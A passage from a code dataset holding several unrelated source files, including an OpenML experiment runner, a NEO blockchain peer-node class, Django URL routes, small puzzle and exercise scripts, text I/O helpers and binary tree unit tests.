'vector_annotation' or args.task == 'instance_segmentation' or args.task == 'object_detection' or args.task == 'keypoint_detection':\n c_strategy = SuperviselyObjectDetectionStrategy(args)\n elif args.dataset_format == \"VoTT\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = VoTTObjectDetectionStrategy(args)\n elif args.dataset_format == \"SageMaker\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation':\n c_strategy = SageMakerObjectDetectionStrategy(args)\n elif args.dataset_format == \"VGG\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = VGGObjectDetectionStrategy(args)\n elif args.dataset_format == \"GoogleCloud\":\n if args.task == 'object_detection':\n 
c_strategy = GoogleCloudObjectDetectionStrategy(args)\n elif args.dataset_format == \"YOLO\":\n if args.task == 'object_detection':\n c_strategy = YoloObjectDetectionStrategy(args)\n else:\n pass\n\n self.__set_strategy(c_strategy)\n","sub_path":"superannotate/input_converters/converters/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"267153759","text":"import os, argparse\nimport shutil\n\nopen_ml_problems_folder = 'OpenML_datasets'\nsurrogate_data_path = 'data/surrogate/data/'\n\n# fixed test params as first part\nk_params = [30, 50, 100] # 100, 150, 200\nk_random = [0] # 0, 1\nk_reinit = [0] # 0, 1\nevery_ls = 5\n\nn_times = 5\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Find best features for each OpenML problems\")\n\n parser.add_argument('--ils', type=int, help='number of total iteration for ils algorithm', required=True)\n parser.add_argument('--ls', type=int, help='number of iteration for Local Search algorithm', required=True)\n\n args = parser.parse_args()\n\n p_ils = args.ils\n p_ls = args.ls\n\n open_ml_problems = sorted(os.listdir(open_ml_problems_folder))\n\n for ml_problem in open_ml_problems:\n\n # for each problem prepare specific pre-computed real solution file\n ml_problem_name = ml_problem.replace('.csv', '')\n ml_problem_path = os.path.join(open_ml_problems_folder, ml_problem)\n\n # ml_surrogate_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n # f\"--data {ml_problem_path} \" \\\n # f\"--ils {p_ils} \" \\\n # f\"--ls {p_ls} \" \\\n # f\"--output {ml_problem_name} \" \\\n # f\"--generate_only 1\"\n # print(f'Running extraction real evaluations data for {ml_problem_name}')\n # os.system(ml_surrogate_command)\n\n # real_evaluation_data_file_path = os.path.join(surrogate_data_path, ml_problem_name)\n\n # for each multi param:\n # - copy precomputed real_evaluation_data_file\n # - run new instance using specific data\n for k in k_params:\n for k_r in k_random:\n for k_init in k_reinit:\n\n # if not use of k_reinit and use of random, then run multiple times this instance to do mean later\n if k_init == 0 and k_r == 1:\n for i in range(n_times):\n\n str_index = str(i)\n\n while len(str_index) < 3:\n str_index = \"0\" + str_index\n\n output_problem_name = f'{ml_problem_name}_everyLS_{every_ls}_k{k}_random{k_r}_reinit{k_init}_{str_index}'\n\n # copy pre-computed real evaluation data for this instance\n # current_output_real_eval_path = os.path.join(surrogate_data_path, output_problem_name)\n # shutil.copy2(real_evaluation_data_file_path, current_output_real_eval_path)\n\n ml_surrogate_multi_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n f\"--data {ml_problem_path} \" \\\n f\"--ils {p_ils} \" \\\n f\"--ls {p_ls} \" \\\n f\"--every_ls {every_ls} \" \\\n f\"--k_division {k} \" \\\n f\"--k_random {k_r} \" \\\n f\"--k_dynamic {k_init} \" \\\n f\"--output {output_problem_name}\"\n \n print(f'Running extraction data for {ml_problem_name} with [ils: {p_ils}, ls: {p_ls}, k: {k}, k_r: {k_r}, i: {i}]')\n os.system(ml_surrogate_multi_command)\n\n else:\n output_problem_name = f'{ml_problem_name}_everyLS_{every_ls}_k{k}_random{k_r}_reinit{k_init}'\n\n # copy pre-computed real evaluation data for this instance\n # current_output_real_eval_path = os.path.join(surrogate_data_path, output_problem_name)\n # shutil.copy2(real_evaluation_data_file_path, 
current_output_real_eval_path)\n\n ml_surrogate_multi_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n f\"--data {ml_problem_path} \" \\\n f\"--ils {p_ils} \" \\\n f\"--ls {p_ls} \" \\\n f\"--every_ls {every_ls} \" \\\n f\"--k_division {k} \" \\\n f\"--k_random {k_r} \" \\\n f\"--k_dynamic {k_init} \" \\\n f\"--output {output_problem_name}\"\n \n print(f'Running extraction data for {ml_problem_name} with [ils: {p_ils}, ls: {p_ls}, k: {k}, k_r: {k_r}]')\n os.system(ml_surrogate_multi_command)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"run_openML_surrogate_multi_specific.py","file_name":"run_openML_surrogate_multi_specific.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444611016","text":"# test input\n#inp = [65, 8921]\n\n# real input\ninp = [591, 393]\n\nclass Generator:\n\tDIV = 2147483647\n\tdef __init__(self, initial, factor):\n\t\tself.current = initial\n\t\tself.factor = factor\n\n\tdef cycle(self):\n\t\t\"\"\" Passes the generator through a cycle:\n\t\t\tMultiply the current value for the factor\n\t\t\tDivide by DIV\n\t\t\tSet the current value to be the remainder\n\t\t\"\"\"\n\t\tself.current = (self.current * self.factor) % self.DIV\n\t\treturn self.current\n\n\tdef bin(self):\n\t\t\"\"\" Returns the last 16 digits of the binary representation of the current value\n\t\t\"\"\"\n\t\treturn bin(self.current)[-16:]\n\n\tdef getCurrent(self):\n\t\t\"\"\" Returns the current value in decimal form\n\t\t\"\"\"\n\t\treturn self.current\n\n\ndef main(ipt):\n\tscore = 0\n\tgena, genb = Generator(ipt[0], 16807), Generator(ipt[1], 48271)\n\tfor i in range(5000000):\n\t\tprint(\"\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b{} score: {}\".format(i, score), end=\"\")\n\t\taval, bval = gena.cycle(), genb.cycle()\n\t\twhile (aval % 4 != 0):\n\t\t\taval = gena.cycle()\n\t\twhile (bval % 8 != 0):\n\t\t\tbval = genb.cycle()\n\t\tabin, bbin = gena.bin(), genb.bin()\n\t\t#print(\"{}\\t\\t{}\".format(aval, abin))\n\t\t#print(\"{}\\t\\t{}\".format(bval, bbin))\n\t\tif abin == bbin:\n\t\t\tscore += 1\n\tprint(\"\\nScore: \", score)\n\n\nif __name__ == \"__main__\":\n\tmain(inp)","sub_path":"puzzle15-2.py","file_name":"puzzle15-2.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"447461776","text":"from neo import Settings\nfrom neo.Network.TCPRemoteNode import TCPRemoteNode\nfrom neo.Network.IPEndpoint import IPEndpoint\nfrom neo.Core.Blockchain import Blockchain\nfrom neo.Core.Block import Block\nfrom neo.Core.TX.MinerTransaction import MinerTransaction\nfrom neo.Core.TX.Transaction import Transaction,TransactionType\nfrom events import Events\nimport asyncio\nfrom gevent import monkey\nfrom concurrent.futures import ThreadPoolExecutor\nmonkey.patch_all()\nimport random\nimport threading\nfrom autologging import logged\n\n#outside class def so it can be static\n_mempool = {} # contains { uint256, transaction }\n\n@logged\nclass LocalNode():\n\n PROTOCOL_VERSION = 0\n CONNECTED_MAX = 10\n UNCONNECTED_MAX = 1000\n MEMORY_POOL_SIZE = 30000\n\n\n\n __LOOP = None\n\n InventoryReceiving = Events()\n InventoryReceived = Events()\n\n# new_tx_event = threading.Event()\n\n _temppool = set() # contains transactions\n _hash_set = set() # contains transactions\n _known_hashes = [] # contains transaction hashes (uint256)\n\n _cache = None\n\n 
_unconnected_peers = set() #ip enpoints\n _bad_peers = set() #ip endpoints\n _connected_peers = [] #remote nodes\n\n _local_addresses = set() #ip addresses\n _port = 0\n _localhost = '127.0.0.1'\n\n _nonce = random.randint(1294967200,4294967200)\n\n _listener = None\n\n _server_thread = None\n _connect_thread = None\n _pool_thread = None\n\n _server_socket = None\n _server = None\n\n _started = 0\n _disposed = 0\n\n GlobalMissionsEnabled = True\n ServiceEnabled = True\n UnPnpEnabled = False\n UserAgent = \"/NEO:2.0.1/\"\n\n def __init__(self):\n\n# self._make_server()\n\n self._port = Settings.NODE_PORT\n self._make_loops()\n #not sure exactly how this works at the moment\n Blockchain.PersistCompleted.on_change += self.Blockchain_persistCompleted\n\n\n\n def AcceptPeersAsync(self):\n\n while self._disposed == 0:\n\n sock = None\n\n try:\n\n sock, addr = self._listener.AcceptSocketAsync()\n\n remoteNode = TCPRemoteNode(self, addr)\n\n except Exception as e:\n self.__log.debug(\"couldnt get socket %s \" % e)\n pass\n\n def AddTransaction(self, tx):\n if Blockchain.Default() is None: return False\n\n #lock mempool\n\n if tx.Hash() in _mempool:\n return False\n elif Blockchain.Default().ContainsTransaction(tx.Hash()):\n return False\n elif not tx.Verify([v for k,v in _mempool]): return False\n\n _mempool[tx.Hash()] = tx\n # endlock\n\n self.CheckMemPool()\n\n return True\n\n\n def _make_loops(self):\n\n\n self.__LOOP = asyncio.new_event_loop()\n asyncio.set_event_loop(self.__LOOP)\n asyncio.run_coroutine_threadsafe(self.ConnectToPeersLoop(), self.__LOOP)\n\n asyncio.run_coroutine_threadsafe(self.AddTransactionLoop(), self.__LOOP)\n self.__LOOP.run_forever()\n\n\n\n def _close(self):\n self._server.shutdown()\n self._server.server_close()\n\n def LocalAddresses(self):\n return set()\n\n def ConnectedPeers(self):\n return []\n\n def RemoteNodeCount(self):\n return len(self._connected_peers)\n\n\n async def AddTransactionLoop(self):\n# self.new_tx_event.wait()\n\n self.__log.debug(\"Running add transaction loop\")\n while self._disposed == 0:\n transactions = []\n\n #lock temppool\n #if len(self._temppool == 0): continue\n transactions = list(self._temppool)\n self._temppool = []\n #endlock\n\n verified = set()\n #lock mempool\n\n transactions = [tx for tx in transactions if not tx.Hash() in _mempool and not Blockchain.Default().ContainsTransaction(tx.Hash())]\n\n if len(transactions):\n mempool_current = [v for k,v in _mempool]\n for tx in transactions:\n if tx.Verify( mempool_current + transactions):\n verified.add(tx)\n for tx in verified:\n _mempool[tx.Hash()] = tx\n\n self.CheckMemPool()\n #endlock\n\n await self.RelayDirectly(verified)\n\n if self.InventoryReceived is not None:\n [self.InventoryReceived.on_change(tx) for tx in verified]\n\n\n @staticmethod\n def AllowHashes(hashes):\n #lock known hashes\n LocalNode._known_hashes = LocalNode._known_hashes - hashes\n #endlock\n\n\n def KnownHashes(self):\n return self._known_hashes\n\n def Blockchain_persistCompleted(self, block):\n #lock mempool\n for tx in block.Transactions:\n del _mempool[tx.Hash()]\n\n if len(_mempool) == 0: return\n\n remaining = [v for k,v in _mempool]\n _mempool = {}\n\n #lock temp ppol\n self._temppool = self._temppool + remaining\n #end lock temppool\n\n# self.new_tx_event.set()\n #endlock mempool\n\n\n def CheckMemPool(self):\n\n if len(_mempool) <= self.MEMORY_POOL_SIZE: return\n num_to_delete = len(_mempool) - self.MEMORY_POOL_SIZE\n hashes_to_delete = [k for k,v in _mempool][:-num_to_delete]\n for hash in 
hashes_to_delete:\n del _mempool[hash]\n\n\n\n# async def ConnectToPeersAsync(self, address, port):\n\n\n async def ConnectToPeersAsync(self, remoteEndpoint):\n\n if remoteEndpoint.Port == self._port and remoteEndpoint.Address in self.LocalAddresses():\n return\n\n #lock unconnected peers\n try:\n self._unconnected_peers.remove(remoteEndpoint)\n except Exception as e:\n self.__log.debug(\"Could not remove endpoint from unconnected peers\")\n #endlock\n\n #lock connected peers\n for cp in self._connected_peers:\n if cp.ListenerEndpoint.Address == remoteEndpoint.Address and cp.ListenerEndpoint.Port == remoteEndpoint.ListenerEndpoint.Port:\n return\n #endlock\n\n remote_node = TCPRemoteNode(self, remoteEndpoint)\n\n result = remote_node.ConnectAsync()\n if result:\n await self.OnConnected(remote_node)\n\n\n @asyncio.coroutine\n def ConnectToPeersLoop(self):\n\n while self._disposed == 0:\n\n connectedCount = len(self._connected_peers)\n unconnectedCount = len(self._unconnected_peers)\n self.__log.debug(\"connect loop: unconnected, connected %s %s \" % (connectedCount, unconnectedCount))\n if connectedCount < self.CONNECTED_MAX:\n\n taskloop = asyncio.get_event_loop()\n tasks = []\n\n if unconnectedCount > 0:\n endpoints = []\n\n #lock unconnected peers\n num_to_take = self.CONNECTED_MAX - connectedCount\n endpoints = list(self._unconnected_peers)[:num_to_take]\n #endlock\n\n for ep in endpoints:\n tasks.append( taskloop.create_task( self.ConnectToPeersAsync(ep)))\n\n elif connectedCount > 0:\n\n #lock connected peers\n [node.RequestPeers() for node in self._connected_peers]\n #endlock\n\n else:\n seeds = [IPEndpoint(str.split(':')[0], int(str.split(':')[1])) for str in Settings.SEED_LIST]\n# seeds = [IPEndpoint('seed1.neo.org',20333),]\n\n for ep in seeds:\n tasks.append(taskloop.create_task(self.ConnectToPeersAsync(ep)))\n\n wait_tasks = asyncio.wait(tasks)\n taskloop.run_until_complete(wait_tasks)\n taskloop.close()\n\n i = 0\n\n while i < 50 and self._disposed == 0:\n i = i+1\n asyncio.sleep(1)\n\n\n @staticmethod\n def ContainsTransaction(self):\n #lock mempool\n return hash in _mempool\n #endlock\n\n\n def Dispose(self):\n if self._disposed == 0:\n\n if self._started > 0:\n\n Blockchain.PersistCompleted -= self.Blockchain_persistCompleted\n\n if self._listener is not None: self._listener.Dispose()\n\n if self._connect_thread.is_alive(): self._connect_thread.join()\n\n #lock unconnected peers\n\n if self._unconnected_peers < self.UNCONNECTED_MAX:\n #lock connected peers\n self._unconnected_peers = self._unconnected_peers + [peer for peer in self._connected_peers if peer.ListenerEnpoint is not None][:self.UNCONNECTED_MAX - len(self._unconnected_peers)]\n #endlock\n\n nodes = []\n\n #lock connected peers\n nodes = list(self._connected_peers)\n #endlock\n\n #this shouldbe done async, i guess\n [node.Disconnect(False) for node in nodes]\n\n #self.new_tx_event.set()\n\n if self._pool_thread.is_alive(): self._pool_thread.join()\n\n #self.new_tx_event.clear()\n\n\n @staticmethod\n def GetMemoryPool():\n #lock mempool\n return [v for k,v in _mempool]\n #endlock\n\n def GetRemoteNodes(self):\n #lock connected peers\n return list(self._connected_peers)\n #endlock\n\n @staticmethod\n def GetTransaction(hash):\n\n #lock mempool\n if _mempool[hash] is not None:\n return _mempool[hash]\n #endlock\n return None\n\n @staticmethod\n def IsIntranetAddress( address ):\n raise NotImplementedError()\n\n @staticmethod\n def LoadState(stream):\n raise NotImplementedError()\n\n async def OnConnected(self, 
remoteNode):\n\n #lock connected peres\n length = len(self._connected_peers)\n self._connected_peers.append(remoteNode)\n remoteNode.ServerID = length\n #endlock\n# self.__log.debug(\"connected peers: %s \" % [p.ToString() for p in self._connected_peers])\n remoteNode.Disconnected.on_change += self.RemoteNode_Disconnected\n remoteNode.InventoryReceived.on_change += self.RemoteNode_InventoryReceived\n remoteNode.PeersReceived.on_change += self.RemoteNode_PeersReceived\n node_name = 'RemoteNode-%s-thread ' % remoteNode.RemoteEndpoint.Address\n loop = asyncio.get_event_loop()\n await loop.create_task(remoteNode.StartProcol())\n# thread = threading.Thread(target=remoteNode.StartProcol,name=node_name, daemon=True)\n# thread.start()\n# await remoteNode.StartProcol()\n\n\n async def ProcessWebsocketAsync(self, context):\n raise NotImplementedError()\n\n def Relay(self, inventory):\n\n\n if inventory is MinerTransaction: return False\n\n #lock known hashes\n if inventory.Hash() in self._known_hashes: return False\n #endlock\n\n self.InventoryReceiving.on_change(self, inventory)\n\n if type(inventory) is Block:\n if Blockchain.Default() == None: return False\n\n if Blockchain.Default().ContainsBlock(inventory.HashToByteString()):\n self.__log.debug(\"cant add block %s because blockchain already contains it \" % inventory.HashToByteString())\n return False\n self.__log.debug(\"Will Try to add block\" % inventory.HashToByteString())\n\n if not Blockchain.Default().AddBlock(inventory): return False\n\n elif type(inventory) is Transaction or issubclass(type(inventory), Transaction):\n if not self.AddTransaction(inventory): return False\n\n else:\n if not inventory.Verify(): return False\n\n\n relayed = self.RelayDirectly(inventory)\n\n self.InventoryReceived.on_change(inventory)\n\n return relayed\n\n def RelayDirectly(self, inventory):\n\n relayed = False\n #lock connected peers\n\n #RelayCache.add(inventory)\n\n# for node in self._connected_peers:\n# self.__log.debug(\"Relaying to remote node %s \" % node)\n# relayed |= node.Relay(inventory)\n\n #end lock\n return relayed\n\n def RemoteNode_Disconnected(self, sender, error):\n remoteNode = sender\n remoteNode.Disconnected.on_change -= self.RemoteNode_Disconnected\n remoteNode.InventoryReceived.on_change -= self.RemoteNode_InventoryReceived\n remoteNode.PeersReceived.on_change -= self.RemoteNode_PeersReceived\n\n if error and remoteNode.ListenerEndpoint is not None:\n #lock bad peers\n self._bad_peers.add(remoteNode.ListenerEndpoint)\n #endlock\n\n #lock unconnected peers\n #lock connected peers\n if remoteNode.ListenerEndpoint is not None:\n self._unconnected_peers.remove(remoteNode.ListenerEndpoint)\n\n self._connected_peers.remove(remoteNode)\n #endlock\n #endlock\n\n def RemoteNode_InventoryReceived(self, sender, inventory):\n\n self.__log.debug(\"Remote Node inventory received %s \" % inventory)\n\n if inventory is Transaction and inventory.Type is not TransactionType.ClaimTransaction and inventory.Type is not TransactionType.IssueTransaction:\n\n if Blockchain.Default() is None: return\n\n #lock known hashes\n if inventory.Hash in self._known_hashes: return\n self._known_hashes.append(inventory.Hash)\n # endlock\n\n self.InventoryReceiving.on_change(self, inventory)\n\n #lock temppool\n self._temppool.add(inventory)\n #endlock\n #self.new_tx_event.set()\n\n else:\n self.Relay(inventory)\n\n def RemoteNode_PeersReceived(self, sender, peers):\n\n #lock unconnected peers\n\n\n if len(self._unconnected_peers) < self.UNCONNECTED_MAX:\n\n #lock bad 
peers\n #lock connected peers\n\n self._unconnected_peers = self._unconnected_peers + peers\n self._unconnected_peers -= self._bad_peers\n self._unconnected_peers -= set([p.ListenerEndpoint for p in self._connected_peers])\n #endlock connected peers\n #endlock bad peers\n\n\n #endlock unconnected peers\n\n\n @staticmethod\n def SaveState( stream ):\n raise NotImplementedError()\n\n async def _startTask(self, port, ws_port):\n\n self.__log.debug(\"__start_task\")\n\n if port > 0:\n endpoint = IPEndpoint(IPEndpoint.ANY,port)\n try:\n self._listener = TCPRemoteNode(self, endpoint)\n self._listener.daemon_threads = True\n except Exception as e:\n self.__log.debug(\"coludnt start remote node: %s \" % e)\n\n try:\n self._port = port\n\n executor = ThreadPoolExecutor()\n await self.__LOOP.run_in_executor(executor, self.AcceptPeersAsync())\n except Exception as e:\n self.__log.debug(\"ecxpetion creating listener: %s \" % e)\n\n if ws_port > 0:\n # create websocket host\n pass\n\n\n\n def Start(self, port=0, ws_port=0):\n if self._started == 0:\n\n\n asyncio.run_coroutine_threadsafe(self._startTask(port, ws_port), self.__LOOP)\n# asyncio.ensure_future(self._startTask(port, ws_port))\n# self.__LOOP.run_until_complete(future)\n yield self.__LOOP.run_forever()\n\n\n def SyncronizeMemoryPool(self):\n #lock connected peers\n\n for node in self._connected_peers:\n node.RequestMemoryPool()\n","sub_path":"neo/Network/LocalNode.py","file_name":"LocalNode.py","file_ext":"py","file_size_in_byte":15609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"568577335","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^client/$',views.index,name='index'),\n\t#url(r'^client/(?P[0-9]+)/$',views.client,name='client'),\n\t\n\turl(r'^client/(?P[0-9]+)/$',views.detail,name='detail'),\n\turl(r'^client/addclient/$',views.addclient,name='addclient'),\n\turl(r'^client/(?P[0-9]+)/addproject/$',views.addproject,name='addproject'),\n\turl(r'^client/(?P[0-9]+)/projectdetails/(?P[0-9]+)/$',views.projectdetails,name='projectdetails'),\n\turl(r'^client/(?P[0-9]+)/project/(?P[0-9]+)/report/$',views.report,name='report'),\n\t]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"270888698","text":"# Exercício 015\r\n\r\n# Escreva um programa que pergunte a quantidade de KM percorridos por um carro alugado\r\n# e a quantidade de dias pelos quais ele foi alugado. Calcule o preço a pagar, sabendo\r\n# que o carro custa R$60,00 por dia e R$ 0,15 por KM rodado.\r\n\r\ndias = float(input('Quantos dias o carro está alugado? '))\r\nkm = float(input('Quantos kilometros foram rodados? 
'))\r\n\r\ndiap = dias*60\r\nkmp = km*0.15\r\n\r\nprint('O preço total é {:.2f}.\\nVocê está pagando {:.2f} por dias alugados.\\nVocê está pagando {:.2f} por Km rodado.'.format(diap + kmp, diap, kmp))\r\n","sub_path":"Mundo 1 - Fundamentos/ex015.py","file_name":"ex015.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"642868690","text":"\nimport csv\nimport re\nfrom utils.io.common import create_directories_for_file_name\n\n\ndef load_dict_csv(file_name, value_type=str):\n \"\"\"\n Loads a .csv file as a dict, where the first column indicate the key string\n and the following columns are the corresponding value or list of values.\n :param file_name: The file name to load.\n :param value_type: Each value will be converted to this type.\n :return: A dictionary of every entry of the .csv file.\n \"\"\"\n d = {}\n with open(file_name, 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n id = row[0]\n value = list(map(value_type, row[1:]))\n if len(value) == 1:\n value = value[0]\n d[id] = value\n return d\n\n\ndef load_dict_idl(file_name, dim, value_type=str):\n \"\"\"\n Loads a .idl file as a dict. Returns a list of lists, while dim represents the dimension of the inner list.\n :param file_name: The file name to load.\n :param dim: The dimension of the inner list.\n :param value_type: Each value will be converted to this type.\n :return: A dictionary of every entry of the .idl file.\n \"\"\"\n numeric_const_pattern = r'[-+]?[0-9]*\\.?[0-9]+(?:[eE][-+]?[0-9]+)?'\n d = {}\n with open(file_name, 'r') as file:\n for line in file.readlines():\n id_match = re.search('\"(.*)\"', line)\n id = id_match.groups()[0]\n match_string = '\\(' + ','.join(['(' + numeric_const_pattern + ')'] * dim) + '\\)'\n coords_matches = re.findall(match_string, line)\n values = []\n for coords_match in coords_matches:\n values.append([value_type(coords_match[i]) for i in range(dim)])\n d[id] = values\n return d\n\n\ndef load_list(file_name):\n \"\"\"\n Loads a .txt file as a list, where every line is a list entry.\n :param file_name: The file name to load.\n :return: A list of every line of the .txt file.\n \"\"\"\n with open(file_name, 'r') as file:\n return [line.strip('\\n') for line in file.readlines()]\n\n\ndef load_list_csv(file_name):\n \"\"\"\n Loads a .csv file as a list of lists, where every line is a list entry.\n :param file_name: The file name to load.\n :return: A list of lists of every value of every line of the .csv file.\n \"\"\"\n with open(file_name, 'r') as file:\n reader = csv.reader(file)\n return [row for row in reader]\n\n\ndef save_dict_csv(d, file_name, header=None):\n \"\"\"\n Saves a dictionary as a .csv file. The key is written as the first column. If the value is a list or a tuple,\n each entry is written as a consecutive column. 
Otherwise, the value is written as the second column\n :param d: The dictionary do write\n :param file_name: The file name.\n :param header: If given, this list will be written as a header.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n writer = csv.writer(file)\n if header is not None:\n writer.writerow(header)\n for key, value in sorted(d.items()):\n if isinstance(value, list):\n writer.writerow([key] + value)\n elif isinstance(value, tuple):\n writer.writerow([key] + list(value))\n else:\n writer.writerow([key, value])\n\n\ndef save_string_txt(string, file_name):\n \"\"\"\n Saves a string as a text file.\n :param string: The string to write.\n :param file_name: The file name.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n file.write(string)\n\n\ndef save_list_txt(string_list, file_name):\n \"\"\"\n Saves string list as a text file. Each list entry is a new line.\n :param string_list: The string list to write.\n :param file_name: The file name.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n string_list_with_endl = [string + '\\n' for string in string_list]\n file.writelines(string_list_with_endl)\n","sub_path":"utils/io/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173849986","text":"import sys\n\nfor line in open(sys.argv[1]):\n\tnum, count, coin = int(line.rstrip()), 0, 5\n\twhile True:\n\t\tif num - coin >= 0: \n\t\t\tnum -= coin\n\t\t\tcount += 1\n\t\telse: \n\t\t\tcoin -= 2\n\t\tif coin < 0: break\n\tprint(count)\n","sub_path":"moderate/python/28_minimum_coins.py3","file_name":"28_minimum_coins.py3","file_ext":"py3","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"562389634","text":"\"\"\"\nTest for BinaryTree class\n\"\"\"\n\nimport unittest\n\nfrom binarytree.node import Node\nfrom binarytree.binarytree import BinaryTree\n\n\nclass BinaryTreeTestCase(unittest.TestCase):\n \"\"\"\n This Case of tests checks the functionality of the implementation of Binary Tree\n \"\"\"\n\n def test_add_nodes_from_list(self):\n \"\"\"\n (positive testing of add function)\n Create a binary tree.\n Add nodes from list to the binary tree.\n Test that all the nodes are placed correctly\n \"\"\"\n binary_tree = BinaryTree(4)\n nodes = [Node(3), Node(1), Node(2), Node(6), Node(7), Node(5)]\n for node in nodes:\n binary_tree.add(node)\n self.assertEqual(binary_tree.root.value, 4)\n self.assertEqual(binary_tree.root.left.value, 3)\n self.assertEqual(binary_tree.root.right.value, 6)\n\n def test_call_add_non_integers_raised_error(self):\n \"\"\"\n (negative testing of add function)\n Create a binary tree.\n Test that call of add method with incorrect input values raises Value error\n \"\"\"\n binary_tree = BinaryTree(4)\n not_nodes = [4, 10.44465, 'two', None, {}, ['wow']]\n for val in not_nodes:\n self.assertRaises(ValueError, binary_tree.add, val)\n\n def test_add_to_empty_binary_tree(self):\n \"\"\"\n (end-to-end testing of add function)\n Create an empty binary tree.\n Add nodes from a values generator to the binary tree.\n Test that all the nodes are placed correctly\n \"\"\"\n binary_tree = BinaryTree()\n for val in range(1, 5):\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.root.value, 1)\n self.assertEqual(binary_tree.root.right.value, 2)\n 
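# These values arrive in increasing order, so each insert lands as a right\n        # child and the tree degenerates into a right-leaning chain; that is why\n        # the remaining assertions walk .right repeatedly.\n        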
self.assertEqual(binary_tree.root.right.right.value, 3)\n self.assertEqual(binary_tree.root.right.right.right.value, 4)\n\n def test_find_existing_nodes(self):\n \"\"\"\n (positive testing of find function)\n Create an empty binary tree.\n Add nodes from list to the binary tree.\n Test that the nodes of the binary tree can be found\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n for val in node_values:\n self.assertEqual(binary_tree.find(Node(val)).value, Node(val).value)\n\n def test_call_find_incorrect_values(self):\n \"\"\"\n (negative testing of find function)\n Create an empty binary tree.\n Add nodes from list to the binary tree.\n Test that call of find with incorrect values returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n wrong_values = [Node(0), Node(1), 10, 2, 13, 100, 548150, 10.44465, 'two', None, {}]\n for val in wrong_values:\n self.assertEqual(binary_tree.find(val), None)\n\n def test_find_odd_numbers_in_even_number_binary_tree(self):\n \"\"\"\n (end-to-end testing of find function)\n Create an empty binary tree.\n Add nodes with even numbers from generator to the binary tree.\n Test that call of find with odd numbers from generator returns None\n \"\"\"\n binary_tree = BinaryTree()\n for val in range(10, 0, -1):\n if not val % 2:\n binary_tree.add(Node(val))\n for val in range(10, 0, -2):\n self.assertEqual(binary_tree.find(Node(val)).value, Node(val).value)\n for val in range(10, 0, -1):\n if val % 2:\n self.assertEqual(binary_tree.find(Node(val)), None)\n\n def test_remove_existing_nodes(self):\n \"\"\"\n (positive testing of remove function)\n Create a binary tree by adding nodes from list.\n Remove nodes using the values from the list.\n Test that the nodes of the binary tree are removed correctly\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n while node_values:\n self.assertEqual(binary_tree.remove(Node(node_values[-1])).value, node_values[-1])\n node_values.pop()\n self.assertEqual(binary_tree.root.value, None)\n\n def test_call_remove_incorrect_values(self):\n \"\"\"\n (negative testing of remove function)\n Create an empty binary tree.\n Add nodes from list of values to the binary tree.\n Test that call of remove with incorrect values returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n wrong_values = [Node(0), Node(100), 10, 5, 100, 548150, 10.44465, None, 'two', {}]\n for val in wrong_values:\n self.assertEqual(binary_tree.remove(val), None)\n\n def test_call_remove_already_removed_nodes(self):\n \"\"\"\n (end-to-end testing of remove function)\n Create an empty binary tree.\n Add nodes from list of values to the binary tree and remove them.\n Test that call of remove with already removed nodes returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.remove(Node(node_values[0])).value, node_values[0])\n while node_values:\n self.assertEqual(binary_tree.remove(Node(node_values[-1])), None)\n node_values.pop()\n\n def test_get_height_of_binary_trees(self):\n \"\"\"\n (positive testing of get_height function)\n Create binary trees with different number and 
